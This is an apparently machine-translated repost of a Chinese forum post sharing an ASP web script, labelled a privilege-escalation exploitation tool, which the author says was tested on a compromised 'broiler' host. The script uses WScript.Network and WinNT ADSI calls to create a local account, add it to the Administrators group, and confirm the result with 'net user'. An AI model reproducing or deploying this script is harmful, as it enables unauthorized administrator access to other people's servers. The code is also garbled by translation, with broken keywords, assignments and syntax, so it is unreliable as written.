Add superuser .asp code

xiaoxiao2021-03-06 48

In fact, the last week and Kevin were tested on my broiler, as well as the Hippo epic. The result is a user who successfully added the Administrators group under User permission (although I can't believe my eyes).

The last time Kevin did not speak, I didn't dare to release it .... Now I have seen him on his blog, it turns back (it has also improved a little more than I last test, add a form) Everyone has a blessing `` `

Anyway code is right, but very few can succeed, take advantage of luck. . Oh, the next step I want to integrate him into the ocean.嘿嘿.

code:

.Network object script permissions Lifting Vulnerability Utilization Tool

User:

Password:

<% @ codepage = 936

ON Error ResMe next

If Request.ServerVariables ("remote_addr") <> "127.0.0.1" THEN

Response.write "IP! S N0T Right"

Else

IF Request ("UserName") <> "" "

UserName = Request ("UserName")

PASSWD = Request ("passwd")

Response.expires = 0

Session.Timeout = 50

Server.scripttimeout = 3000

Set lp = server.createObject ("wscript.network")

Oz = "Winnt: //" & lp.computername

Set ob = GetObject (oz)

Set oe = getObject (oz & "/ administrators, group")

Set = obs.create ("User", Username)

Od.setPassword Passwd

Od.setInfo

OE.Add Oz & "/" & username

IF Err THEN

Response.write "~~ Don't buy 6 1 today ... 2 yuan to buy a bottle can be happy ..."

Else

IF INSTR ("Wscript.Shell"). EXEC ("cmd.exe / c net user" & username.stdout.readall, "Last Login"> 0 THEN

"Although there is no mistake, it seems that it is not established. You must be very depressed."

Else

Response.write "OMG!" & Username & "account is actually become! This is an unknown vulnerability. 5,000,000RMB is your" "

END IF

Else

Response.write "Please enter the user name" end if

END IF

转载请注明原文地址:https://www.9cbs.com/read-81212.html

9cbs

New Post(0)